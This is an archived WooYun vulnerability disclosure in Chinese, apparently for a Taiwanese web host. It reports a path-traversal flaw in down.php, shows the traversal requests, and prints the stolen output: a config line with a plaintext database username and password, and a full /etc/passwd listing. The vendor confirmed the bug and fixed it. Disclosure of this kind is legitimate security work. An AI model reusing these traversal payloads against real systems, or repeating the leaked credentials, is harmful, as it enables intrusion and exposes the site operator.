乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-01-27: 厂商已经修复漏洞并主动公开,细节向公众公开
rt
目标:http://**.**.**.**构造,
http://**.**.**.**/down.php?hDFile=../../down.php
配置文件
http://**.**.**.**/down.php?hDFile=../../include/php_script/common.php
common.php中
$DB_str = "mysql,localhost,Zongtai-WWW,zongtai,zongtaiZONGTAI22513338";$NowWebSite = "http://**.**.**.**/";$Config['UserFilesPath'] = '/smarteditupfiles/';
/etc/passwd
http://**.**.**.**/down.php?hDFile=../../../../../../etc/passwd
passwd中
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinmysql:x:500:500::/home/mysql:/bin/falsemabubu:x:501:524::/Services/Files/upload_files/mabubu:/bin/falsesobdeall:x:502:524::/Services/Files/upload_files/sobdeall:/bin/falsesisso:x:503:524::/Services/Files/upload_files/sisso:/bin/falsemabubu_test:x:504:524::/Services/Files/upload_files_test/mabubu:/bin/falsesisso_test:x:505:524::/Services/Files/upload_files_test/sisso:/bin/falsekaloo:x:506:524::/Services/Files/upload_files/kaloo:/bin/falseteaman:x:507:524::/Services/Files/upload_files/teaman:/bin/falsebooklife:x:508:524::/Services/Files/programing/booklife/upload_files:/bin/falsekaloo_test:x:509:524::/Services/Files/upload_files_test/kaloo:/bin/falseponijohn:x:510:524::/Services/Files/programing/ponijohn/upload_files:/bin/falseteaman_test:x:511:524::/Services/Files/programing-test/teaman/upload_files/teaman:/bin/falsebestpals:x:512:524::/Services/Files/programing/bestpals/upload_files:/bin/falselilliputiens:x:513:524::/Services/Files/programing/lilliputiens/upload_files:/bin/falsesoapmaker:x:514:524::/Services/Files/programing/soapmaker/upload_files/soapmaker:/bin/falselilliputiens_test:x:515:524::/Services/Files/programing-test/lilliputiens/upload_files/lilliputiens:/bin/falseminihope:x:516:524::/Services/Files/upload_files/minihope:/bin/falseymr:x:517:524::/Services/Files/programing/ymr/upload_files/ymr/:/bin/falseymr_test:x:518:524::/Services/Files/programing-test/ymr/upload_files/ymr:/bin/falsesisso-pos:x:519:524::/Services/Files/fonlego-pos/sisso:/bin/falseshangyu:x:520:524::/Services/Files/shangyu:/bin/falsemasmas:x:521:524::/Services/Files/programing/masmas/upload_files/masmas:/bin/falsealatech:x:522:524::/Services/Files/programing/alatech/upload_files/alatech:/bin/falseminihope-pos:x:523:524::/Services/Files/programing/minihope/upload_files/minihope/pos_stock:/bin/falseminihope-mstc:x:524:525::/Services/Files/programing/minihope/upload_files/minihope/minihope-mstc:/bin/falsecht:x:525:526::/Services/Files/programing/cht:/bin/falsegeagle:x:526:524::/Services/Files/programing/geagle/upload_files:/bin/falsejoederek:x:527:527::/home/joederek:/bin/bashgennies:x:528:524::/Services/Files/upload_files/gennies:/bin/falsegennies_wp_maternity:x:529:524::/Services/Files/programing-wp/gennies/maternity:/bin/falsegennies_wp_motherhood:x:530:524::/Services/Files/programing-wp/gennies/motherhood:/bin/falsegennies_wp_pregnancy:x:531:524::/Services/Files/programing-wp/gennies/pregnancy:/bin/falselakeinsports:x:532:524::/Services/Files/programing/lakeinsports/upload_files/lakeinsports:/bin/falsegennies_wp_treasuremap:x:533:533::/Services/Files/programing-wp/gennies/treasuremap:/bin/falsecani:x:534:524::/Services/Files/upload_files/cani:/bin/falsealatech-en:x:575:524::/Services/Files/upload_files/alatech-en:/bin/falsegoodhon:x:576:524::/Services/Files/upload_files/goodhon:/bin/falsezongtai-www:x:577:524::/Services/Files/programing/zongtai-www:/bin/falsegennies_wp_mommy-knowledge:x:578:524::/Services/Files/programing-wp/gennies/mommy-knowledge:/bin/falsemombabyfun:x:579:524::/Services/Files/upload_files/mombabyfun:/bin/falsemombabyfun-pos:x:580:524::/Services/Files/upload_files/mombabyfun/pos:/bin/falselamalama:x:581:581::/Services/Files/upload_files/lamalama:/bin/falselamalama-return711:x:582:524::/Services/Files/upload_files/lamalama/return711:/bin/falsebuddybuddy-pos:x:583:583::/Services/Files/programing/buddybuddy/upload_files/buddybuddy/pos:/bin/falsebuddybuddy:x:584:584::/Services/Files/upload_files/buddybuddy:/bin/falsepet_health_food:x:585:585::/Services/Files/programing-wp/buddybuddy/pet_health_food:/bin/falsedollbao:x:586:524::/Services/Files/upload_files/dollbao:/bin/falsesobdeall-pos:x:587:524::/Services/Files/upload_files/sobdeall/pos:/bin/false
common.php
passwd
..
危害等级:高
漏洞Rank:17
确认时间:2016-01-14 03:47
感謝通報
2016-01-27:已修復